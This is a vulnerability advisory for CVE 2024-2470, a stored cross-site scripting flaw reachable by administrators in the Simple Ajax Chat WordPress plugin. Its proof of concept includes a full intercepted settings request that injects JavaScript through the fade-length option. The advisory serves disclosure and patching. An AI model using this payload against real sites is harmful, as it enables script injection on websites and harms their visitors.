Simple Ajax Chat < 20240412 – Admin+ Stored XSS | CVE 2024-2470

Description

The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

This was partially fixed in 0240216 but the fix was insufficient.

Proof of Concept

1. Navigate to https://exampl.com/wp-admin/options-general.php?page=simple_ajax_chat
2. Save the plugin settings and intercept the request with Burp Suite.
3. Replace the plugin settings in the request body with:

```
&sac_options%5Bsac_version%5D=20231101&sac_options%5Bsac_default_handle%5D=Simple+Ajax+Chat&sac_options%5Bsac_default_message%5D=Welcome+to+the+Chat+Forum&sac_options%5Bsac_use_url%5D=1&sac_options%5Bsac_use_textarea%5D=1&sac_options%5Bsac_play_sound%5D=1&sac_options%5Bmax_chats%5D=999&sac_options%5Bmax_chars%5D=500&sac_options%5Bmax_uname%5D=20&sac_options%5Bsac_notification_title%5D=New+chat+message&sac_options%5Bsac_notification_icon%5D=http%3A%2F%2F192.168.1.36%2Fwordpress%2Fwp-content%2Fplugins%2Fsimple-ajax-chat%2Fresources%2Fsac-400.png&sac_options%5Bsac_update_seconds%5D=3000&sac_options%5Bsac_fade_length%5D=1666;alert(`xss`)&sac_options%5Bsac_fade_from%5D=%23ffffcc&sac_options%5Bsac_fade_to%5D=%23ffffff&sac_options%5Bsac_enable_style%5D=1&sac_options%5Bsac_custom_styles%5D=div%23simple-ajax-chat%7Bwidth%3A100%25%3Boverflow%3Ahidden%3Bmargin%3A0+0+20px+0%3B%7D%0D%0Adiv%23sac-content%7Bdisplay%3Anone%3B%7D%0D%0Adiv%23sac-output%7Bfloat%3Aleft%3Bwidth%3A58%25%3Bheight%3A350px%3Boverflow%3Aauto%3Bborder%3A1px+solid+%23d1d1d1%3B%7D%0D%0Adiv%23sac-output.sac-reg-req%7Bfloat%3Anone%3Bwidth%3A100%25%3Bheight%3Aauto%3Bborder%3A0%3B%7D%0D%0Adiv%23sac-latest-message%7Bpadding%3A5px+10px%3Bfont-size%3A14px%3Bbackground-color%3A%23d1d1d1%3Btext-shadow%3A1px+1px+1px+rgba%28255%2C255%2C255%2C0.5%29%3B%7D%0D%0Aul%23sac-messages%7Bmargin%3A10px+0%3Bpadding%3A0%3Bfont-size%3A14px%3Bline-height%3A20px%3B%7D%0D%0Aul%23sac-messages+li%7Bmargin%3A0%3Bpadding%3A4px+10px%3B%7D%0D%0Aul%23sac-messages+li+span%7Bfont-weight%3Abold%3B%7D%0D%0Adiv%23sac-panel%7Bfloat%3Aright%3Bwidth%3A38%25%3B%7D%0D%0Aform%23sac-form+fieldset%7Bmargin%3A0+0+5px+0%3Bpadding%3A0%3Bborder%3A0%3B%7D%0D%0Aform%23sac-form+fieldset+label%2Cform%23sac-form+fieldset+input%2Cform%23sac-form+fieldset+textarea%7Bfloat%3Aleft%3Bclear%3Aboth%3Bwidth%3A94%25%3Bmargin%3A0+0+2px+0%3Bfont-size%3A14px%3B%7D%0D%0Aform%23sac-form+fieldset+textarea%7Bheight%3A133px%3B%7D%0D%0A.tooltip%7Bborder%3A0%3Btext-shadow%3Anone%3B%7D&sac_options%5Bsac_script_url%5D=&sac_options%5Bsac_content_chat%5D=&sac_options%5Bsac_chat_append%5D=&sac_options%5Bsac_content_form%5D=&sac_options%5Bsac_form_append%5D=&sac_options%5Bsac_text_color%5D=%23777777&sac_options%5Bsac_name_color%5D=%23333333
```